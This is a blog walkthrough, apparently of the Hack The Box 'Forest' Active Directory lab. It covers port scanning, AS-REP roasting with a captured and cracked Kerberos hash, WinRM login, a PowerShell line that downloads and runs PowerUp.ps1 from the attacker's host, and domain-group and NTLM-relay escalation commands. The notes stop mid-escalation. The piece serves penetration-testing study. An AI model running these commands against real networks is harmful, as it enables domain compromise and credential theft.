htb-windows-Forest

Posted on | In
Words count in article: 1.3k | Reading time ≈ 7

简介

信息收集

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
$ nmap -sC -sV -p53,88,135,139,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49670,49676,49677,49684,49695,49714 --script=vuln -oA scan/Forest-vuln 10.10.10.161
# Nmap 7.70 scan initiated Thu Dec 12 21:33:22 2019 as: nmap -sC -sV -p53,88,135,139,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49670,49676,49677,49684,49695,49714 --script=vuln -oA scan/Forest-vuln 10.10.10.161
Pre-scan script results:
| broadcast-avahi-dos:
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for forest.htb (10.10.10.161)
Host is up (0.29s latency).

PORT      STATE SERVICE      VERSION
53/tcp    open  domain?
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2019-12-12 13:40:57Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: HTB)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
|_ssl-ccs-injection: No reply from server (TIMEOUT)
|_sslv2-drown:
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
|_sslv2-drown:
3269/tcp  open  tcpwrapped
|_ssl-ccs-injection: No reply from server (TIMEOUT)
|_sslv2-drown:
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
9389/tcp  open  mc-nmf       .NET Message Framing
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49670/tcp open  msrpc        Microsoft Windows RPC
49676/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49677/tcp open  msrpc        Microsoft Windows RPC
49684/tcp open  msrpc        Microsoft Windows RPC
49695/tcp open  msrpc        Microsoft Windows RPC
49714/tcp open  msrpc        Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.70%I=7%D=12/12%Time=5DF241D3%P=x86_64-apple-darwin17.3.0
SF:%r(DNSVersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07v
SF:ersion\x04bind\0\0\x10\0\x03");
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Dec 12 21:52:39 2019 -- 1 IP address (1 host up) scanned in 1156.80 seconds

Namp发现开发非常多的msrpc服务,还有ldap等,端口太多一时无法下手,先从SMB协议入手,找一下共享上的问题。

smb检查

1
$ enum4linux 10.10.10.161

发现该机器位于域内发现两个域HTB、Builtin、存在Administrator、Guest、krbtgt、sebastien、lucinda、svc-alfresco、andy、mark、santi用户、sebastien,结合ldapuserenum.py查询发现用户均存在

尝试ldapdomaindump,失败

在forume张找到tips: Try to use impacket G********S.py to get the hash.,查看impacket中匹配的工具:
GetADUsers.py、GetNPUsers.py、GetUserSPNs.py,找到可用工具GetNPUsers.py:

1
2
3
4
5
6
7
8
9
10
11
12
$ GetNPUsers.py  HTB/ -no-pass -usersfile users.txt -dc-ip 10.10.10.161
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$svc-alfresco@HTB:16bc5d76d80496359fc7671d2ecd1c4b$1399af139dca1ce7ed94df93191182777e221cd02490d48189ea28a325e75d9d3e8aaa8cfd4564fa44ed95c749f3d8b2822385e28a391a982ecca98cb53d8b431dd892ebfcf600766826baaefe8a14cfe55a24273067dc44b9c17417c23a0d0e89a3180db67c18081fee300523f7c426c7d91a8858b36fbcd717f732776ba612d6b762ad0b2620c59e9c755c77d656a5bcd28a1bea2aeeb20eb6c0ac294c83dfa29db77bddd2ea079102f64bae4cfbf47fbf90051744fdf9169fa6f980a999b71015010fab15bb2db8df0403931f2750391800ef1835cbb9f3a44bb6aacc566f
[-] User andy doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User mark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User santi doesn't have UF_DONT_REQUIRE_PREAUTH set

找到sac-alfresco用户的TGT凭证。GetNPUsers.py将尝试为那些设置了属性“不需要Kerberos预身份验证”(UF_DONT_REQUIRE_PREAUTH)的用户列出并获取TGT。 对于具有这种配置的那些用户,将生成John The Ripper输出,可直接通过john进行破解。

crack TGT

1
2
3
4
5
6
7
8
# Rubues破解
$ .\Rubeus.exe asreproast /format:hashcat /outfile:hashes.asreproast
# john破解
$ john --wordlist=passwords_kerb.txt hashes.asreproast
# hashcat破解
$ hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt

$krb5asrep$23$svc-alfresco@HTB:16bc5d76d80496359fc7671d2ecd1c4b$1399af139dca1ce7ed94df93191182777e221cd02490d48189ea28a325e75d9d3e8aaa8cfd4564fa44ed95c749f3d8b2822385e28a391a982ecca98cb53d8b431dd892ebfcf600766826baaefe8a14cfe55a24273067dc44b9c17417c23a0d0e89a3180db67c18081fee300523f7c426c7d91a8858b36fbcd717f732776ba612d6b762ad0b2620c59e9c755c77d656a5bcd28a1bea2aeeb20eb6c0ac294c83dfa29db77bddd2ea079102f64bae4cfbf47fbf90051744fdf9169fa6f980a999b71015010fab15bb2db8df0403931f2750391800ef1835cbb9f3a44bb6aacc566f:s3rvice

拿到用户名密码:HTB/svc-alfresco s3rvice。

user:svc-alfresco

通过smbmap查看可以访问的共享信息

1
2
3
4
5
6
7
8
9
10
11
12
owef@owefsad:~$ smbmap -u  'svc-alfresco' -p 's3rvice' -d HTB  -H 10.10.10.161
[+] Finding open SMB ports....
[+] User SMB session established on 10.10.10.161...
[+] IP: 10.10.10.161:445	Name: forest.htb
	Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	< ... >
	IPC$                                              	READ ONLY	Remote IPC
	NETLOGON                                          	READ ONLY	Logon server share
	SYSVOL                                            	READ ONLY	Logon server share

通过smbclient查看可以具体的文件信息

1
$ smbclient.py HTB/svc-alfresco@10.10.10.161/SYSVOl

通过evil-winrm登陆47001端口,获取user.txt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
$ evil-winrm -i 10.10.10.161 -u 'svc-alfresco'
*Evil-WinRM* PS C:\Users\svc-alfresco> net user svc-alfresco
User name                    svc-alfresco
Full Name                    svc-alfresco
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            1/22/2020 2:54:31 AM
Password expires             Never
Password changeable          1/23/2020 2:54:31 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   9/23/2019 3:09:47 AM

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *Domain Users         *Service Accounts
The command completed successfully.

PowereUp尝试提权

1
IEX (New-Object Net.WebClient).DownloadString("http://10.10.15.46/PowerUp.ps1")

//10.10.10.161/SYSVOL

Exchange Windows Permissions

  • HTB\Exchange

net user owef Forest.htb1 /add /domain

net group “Exchange Windows Permissions” owef /add

net group “Exchange Windows Permissions” svc-alfresco /add

net group “domain controllers” /domain

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net group

Group Accounts for \\

-------------------------------------------------------------------------------
*$D31000-NSEL5BRJ63V7
*Cloneable Domain Controllers
*Compliance Management
*Delegated Setup
*Discovery Management
*DnsUpdateProxy
*Domain Admins																	- 无权限
*Domain Computers
*Domain Controllers
*Domain Guests
*Domain Users
*Enterprise Admins
*Enterprise Key Admins
*Enterprise Read-only Domain Controllers
*Exchange Servers
*Exchange Trusted Subsystem
*Exchange Windows Permissions										- 有权限
*ExchangeLegacyInterop
*Group Policy Creator Owners
*Help Desk
*Hygiene Management
*Key Admins
*Managed Availability Servers
*Organization Management
*Privileged IT Accounts
*Protected Users
*Public Folder Management
*Read-only Domain Controllers
*Recipient Management
*Records Management
*Schema Admins
*Security Administrator
*Security Reader
*Server Management
*Service Accounts
*test
*UM Management
*View-Only Organization Management
1
2
3
python privexchange.py -ah 10.10.10.161 10.10.10.161 -u svc-alfresco -d HTB

ntlmrelayx.py -t ldap://10.10.10.161 -P  --escalate-user svc-alfresco
owefsad wechat
进击的DevSecOps,持续分享SAST/IAST/RASP的技术原理及甲方落地实践。如果你对 SAST、IAST、RASP方向感兴趣,可以扫描下方二维码关注公众号,获得更及时的内容推送。
0%